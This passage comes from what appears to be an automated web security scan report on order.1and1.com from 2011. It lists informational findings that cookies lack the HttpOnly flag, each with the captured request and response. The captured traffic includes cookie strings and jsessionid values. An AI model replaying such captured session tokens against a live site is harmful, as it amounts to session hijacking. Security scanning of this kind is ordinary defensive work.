Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:46:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 22:00:28 GMT; Path=/
ETag: a44e5ebe702505444200d69327f9a64e
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17405


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.44. http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureGuaranteeMoneyback

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureGuaranteeMoneyback HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:46:13 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=4eea5ce422d8c800; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureGuaranteeMoneyback;jsessionid=840C8FF14A96F2E88E83B121AD4FBAA6.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.45. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrCitysearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrCitysearch HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:44:35 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=11ac57a25b290000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch;jsessionid=0ADFC54DD8D5331E15B7FC8E10623743.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.46. http://order.1and1.com/xml/order/FeatureMarketingCtrCitysearch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrCitysearch

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:48 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=eYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 21:58:55 GMT; Path=/
ETag: 0b09543973cc53495b987ed876a0d975
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19136


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.47. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrGoogleAdWords

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrGoogleAdWords HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:44:13 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1bca04215a9d2000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=BCEE8FC0810424623B59EFF358DB720C.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.48. http://order.1and1.com/xml/order/FeatureMarketingCtrGoogleAdWords  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrGoogleAdWords

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrGoogleAdWords;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:32 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=dYlcnQUI4YWFhW25kazFpYzAiLGVYUipBNC4tMS4uLSstKygoKyokJyseIB8eG0AuWmZodi4wK1s0Xm0zJicjIicjISQiHCQbMTpyczkuNWVuNCcoJCMoJSIlICMkHR4=; Expires=Fri, 07-Apr-2079 21:58:39 GMT; Path=/
ETag: ee47e0f87c09a3d63c46a18caf2a3a3c
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 18781


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.49. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrSesub

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrSesub;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:44:54 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=3bGExNDUrVFRUTmFXXjtzbTosNm9iXDRLPjggJCEhIB4gHhsbNTQuMTUoKikoJUo4ZFlbaSEjHk4nUWA9MDEtLDEtKy4sJi4lJC1lZiwhKFhhJzEyLi0yLywvKi0uJyg=; Expires=Fri, 07-Apr-2079 21:59:01 GMT; Path=/
ETag: 132952c0d6bb7a4a7b4abae87cc7b50b
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 19361


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.50. http://order.1and1.com/xml/order/FeatureMarketingCtrSesub  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrSesub

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrSesub HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:44:50 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=1ae0db54ed0ae000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrSesub;jsessionid=0DF1867904FE0D83E8B28BA8A61AB7CD.TCpfix142a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.51. http://order.1and1.com/xml/order/FeatureMarketingCtrStat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrStat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrStat;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:45:12 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=uaF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigdO2t0Oi0uKikuKygrJikqIyQ=; Expires=Fri, 07-Apr-2079 21:59:19 GMT; Path=/
ETag: d67fbe10bae506fcd4ff351782437670
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20433


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

5.52. http://order.1and1.com/xml/order/FeatureMarketingCtrStat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureMarketingCtrStat

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureMarketingCtrStat HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:45:00 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=471b83efa6aad000; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureMarketingCtrStat;jsessionid=D0790980DB93A48996F6F1150DCB81CE.TCpfix140a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.53. http://order.1and1.com/xml/order/FeatureParallelsPlesk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureParallelsPlesk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureParallelsPlesk HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:48:19 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=628afd437aeefc00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureParallelsPlesk;jsessionid=E46BA2D43F2853AEB351064581077136.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.54. http://order.1and1.com/xml/order/FeatureParallelsSB  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureParallelsSB

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureParallelsSB HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:49:23 GMT
Server: Apache
Set-Cookie: __PFIX_TST_=138db911f48c1c00; Path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, no-store, private, must-revalidate
Location: http://order.1and1.com/xml/order/FeatureParallelsSB;jsessionid=53CA82B0A773EB5E03A861E29DC9CC18.TCpfix141a
Content-Length: 0
Connection: close
Content-Type: text/plain


5.55. http://order.1and1.com/xml/order/FeatureSecurityCertificate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/FeatureSecurityCertificate

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xml/order/FeatureSecurityCertificate;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
